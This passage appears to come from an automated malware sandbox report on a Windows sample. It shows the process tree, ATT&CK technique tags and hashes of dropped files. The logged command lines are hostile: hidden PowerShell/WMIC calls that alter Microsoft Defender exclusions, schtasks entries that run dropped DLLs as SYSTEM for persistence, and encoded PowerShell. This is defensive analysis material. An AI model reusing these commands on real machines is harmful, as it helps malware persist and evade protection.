C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2540
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"4⤵PID:1980
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True5⤵PID:1320
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1248 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2508
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\WIQLPldOU\jKBUsJ.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "zuAKRFeuERsPXGg" /V1 /F3⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:2544
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "zuAKRFeuERsPXGg2" /F /xml "C:\Program Files (x86)\WIQLPldOU\yEhSmvh.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2760
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "zuAKRFeuERsPXGg"3⤵PID:3068
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "zuAKRFeuERsPXGg"3⤵PID:2300
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "lJTDNNrzcsGlGa" /F /xml "C:\Program Files (x86)\qMeQRvtmXyxU2\mivLyKY.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2628
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "VRuKNmtcmCQGr2" /F /xml "C:\ProgramData\JHBMAPUCCwSCzfVB\bHXTvZD.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2620
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "UZNAYPGMDJwYFtgCO2" /F /xml "C:\Program Files (x86)\wmJzyKeAXJXSYcIjGXR\yAHbnlf.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:1744
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "dnucZiIKRABpvEFHHbL2" /F /xml "C:\Program Files (x86)\ixMyiQryENPMC\oAFxYQX.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2736
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "cTixPRTTdvXlYhynT" /SC once /ST 02:38:19 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\hwSlakOgexbeQMmf\fWqYTpVE\Iyevaxb.dll\",#1 /BeIdidklXX 385132" /V1 /F3⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:348
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "cTixPRTTdvXlYhynT"3⤵PID:2808
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "AxfyqSaZTcFttLJtv"3⤵PID:1884
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 344 -s 15403⤵
- Loads dropped DLL
- Program crash
PID:1676
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\hwSlakOgexbeQMmf\fWqYTpVE\Iyevaxb.dll",#1 /BeIdidklXX 3851322⤵PID:2892
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\hwSlakOgexbeQMmf\fWqYTpVE\Iyevaxb.dll",#1 /BeIdidklXX 3851323⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:2124 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "cTixPRTTdvXlYhynT"4⤵PID:2528
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {589291B8-073A-47AC-AC41-8AC7B71BE410} S-1-5-21-3450744190-3404161390-554719085-1000:PDIZKVQX\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
PID:1940 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2872 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2952
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1656 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2988
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2316 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2412
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2152
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2136
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2704
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52bf642436899d54f1177e4bc5e47e109
SHA1965b995728825ee390644e888142cd065660f0c1
SHA2566a4d13b02a6cd3b4b0ac524a1f957c66e34a5a1362e22abd38997929eca58c94
SHA5127663f10100326cd7a324396b4cafdd3c9f0e451d32d2fd911ecaae7ddcd372daef2b187dabd00d9ddcbd0ac8a80b2546c7f08e310a39b1f5bff8ac8f474254cd
-
Filesize
2KB
MD5775b385bc7656d7c4295fb53e2a025de
SHA1b7c273ea859cd51f79a03ac5f69fe7667fb6df57
SHA256c928af54a05d29255f99f3f50c0312c477803b19eeaaff0da68d1afac5539227
SHA5126d8eaea9f589cd1424b552da6b331c7685afe9c3d193e83217ac4ed0360cdf064a2cfb78a19ae5f54d4566dadfe1f0569c84efa4686b6b1dc43eb292bc254242
-
Filesize
2KB
MD54c49d9d7d3d2d709d92418baea9f8e79
SHA191c5fe2e3f640be7ee68194d5b79402bbd334fb1
SHA256e1f9a594d90c7d98f7da03a42c3661d84d8d549cf898e2094486707168f996a5
SHA51218e793e22c6798e428dd9420a02ddde46f6f4b3acf32c93cb250450e2fa0b89fca96cbe93d81bf9065334ed0568a541fe57122316eed07eefe7904ba813c8774
-
Filesize
2KB
MD568c1fb635c039704af918530f261f9cd
SHA19ab458d297d657d94611caeb5fe63777980333c0
SHA25616731f20dd9238daab45b93bb45dba4fadb6e4d0a2df19fd2a85379666eca9bf
SHA512f1526bd5d09f6948da023815c3d888762abb7fb7f77ebab268e7c09ec55d1ce01f6805c1425e84eac5fe14ff6dcbb0a5a858f8e2aa63443ac8f78e08586b7171
-
Filesize
2.0MB
MD5e4a1daadafef472873834f3453da783c
SHA1e93897dbe32de27f3fe9283aca3cfa9f7688510b
SHA256e808dd74330b6f6eb6103f4ac4d8eb04bfd56d5fed7137c41065fc144927fbd7
SHA5129c4bcaab786cc1ccd4670a9449116f6aff412364f511dd617bd3a04bf78311dee1001817fd0c75399a498a61e1ff954f0887c3372cf65f033def011f31e3005e
-
Filesize
2KB
MD5904210b6d32f8367a2f7031e4efbc8f6
SHA1a300e47e62764a07d48d0a334056939fcbc7b6e7
SHA256da2b1adb33efdc9277759c5df80bed97d46c4bd61a4a82ad1e83556df1485317
SHA512fd644050bbf87abe655474dd00a2d0e6bb75037c00790610c29d057cf23d8a6e99d37d3c29ebefb2634e7c1c4d0efc78acc85fb4d6f2b54521e1093105a1ed18
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
10KB
MD57d72ff0fe84ae4b6d8de9ede290ffe9b
SHA1f6ffad39da2448be46a66bd2b710c619dfd440c4
SHA256b69c3ffdfda34182554b8fc14b13ca72dbb4c95a84e28ae083923c0372731bd0
SHA51295aebe8b1123b85c0a016b3fac96fde97c7d58f8bf3c63011524c841501207c4eaf83ad9b7cd3089c720fadfc44f4bdbc2b82590e15e1e0a8be11561a758a5d9
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5b5afeb3843c1d1201aebd27a6abdd85d
SHA1fd29b20fa1d824534e63c682e7c2b1c41e22fa3a
SHA256d024d602694f57bd724bc51065f0aef4a576afee7f883d805b40ed44808facc1
SHA512f90ea055fc432be6ae9d54d9ac7d4382259f5e626900e729a2ebfee09ff08d1d4109cbab5c3292ce7ca9a82ea5d34a51be2d1a27a0c80195d115aa4de83a22b0
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\A7QY84WVHI7W9NM2KT48.temp
Filesize7KB
MD587006bff5f677ed1b5fd1928ecac1283
SHA12367891347a35869326ca2876ce15ecec988e8fd
SHA2561877072258b36bd02ae7cb15541f7061ccedd5de52c21c82a0486c67236b5edb
SHA512fbd5e1fba5208de4a25e976b4ceea801da9a1bce92f2a0f5d5191edcb95ecf92df114fc288d593765958d5219eb2d00baa1d52796c376c5a31c64dec5947d07b
-
Filesize
7KB
MD52af95a671cc57670ab96086f87313280
SHA1438ac46ed2a1b200d284df7d4abdf3a602d47627
SHA25674594c705872682d497ada64e773ffabb3eed992be76fdd97bd7b751245cd534
SHA5127f530c98736fba2da80e08729c02a10d91bf5f28460db9fd9ee47ed1c516ddf1e7a07298f5a70ee9a348b97bcd4a8f3cf4890c45ffaf91891b032af95a84764f
-
Filesize
9KB
MD5fd0f95874cabfedeccc2939a11064d31
SHA199bc653078820f5b3bba7b8e4845a900545206ec
SHA2561414ce17a110ceb0ca9671c34855cb240095089e596ace78fe9ab720caca0797
SHA512cb6f18a446b2a3a84dfb649fbd9dd1d85d3908416114059e6c80544ed766ae0c013bf7091ef8c8aa75da4f9baf09722f9913b334b466646f1bb80d4d708fe34d
-
Filesize
6.4MB
MD50da14ed23e485a30e6f3f462d9ebb8fc
SHA1b1d624c226cd7d3ea39484cc787b199eb6980713
SHA256e425f05489aaf2558364341ac01e657e02f1e1f64ca7411851bb0350e1df3ff5
SHA512397cdb92c370c3280f36113b1d1c266a6eea0323db09d98c16c576bb3054087d03ed848ae1e3525047b11f4b2107d07a778aa07ef4fed5a02b3330676f03e44c
-
Filesize
6KB
MD51d99bf11724548681f4bd98abc4ca535
SHA1b68a4833db1dc57be41fb7957cdf9d490c81676c
SHA25649f85dcda349f06941c1b90398fd76b05f1df78f2909b0f59f44c1a5d3f2ab96
SHA51264e203e5d5f593250d1c9445e51880cee4da6ba00c84f490a9000effd20e14375e90f173f44a3102116c8e12a72652cffe432d0268c1a19f5d84f2f9b78cd7d1
-
Filesize
6.4MB
MD5e38c84a49a2b1169af8e5a62347da177
SHA122dcb256a127d21a7796f4adef1168a6790cbccc
SHA256e4a603d6de818b78986189ff14b166b095b117732afa9058778e07ddacca1c39
SHA51208d1a394edbe2cbffc4d57514bef27398ab94a023278e77368628a249656aabaef43398736a44fa1ff4ae4c69c94bb81ace18f44c408298c5ca22b3be1eecd8d
-
Filesize
6.8MB
MD540e77e23b5a945c6d3ade703499ad40a
SHA1eae8084ac46d70efbbaca2f8090850a976ecafb5
SHA2563cc5d9504e660047094eb426658209cb0acc72d6d59d59c9a43af87c10f85843
SHA512a910f6bc15b3c60202db3e67b27305bb0b28ee228c3f75e7ba6b43deedd544f4738f1590e7d32cbed1665ef136e39e21184c940f11d44d4ce49d85cb7aeddda8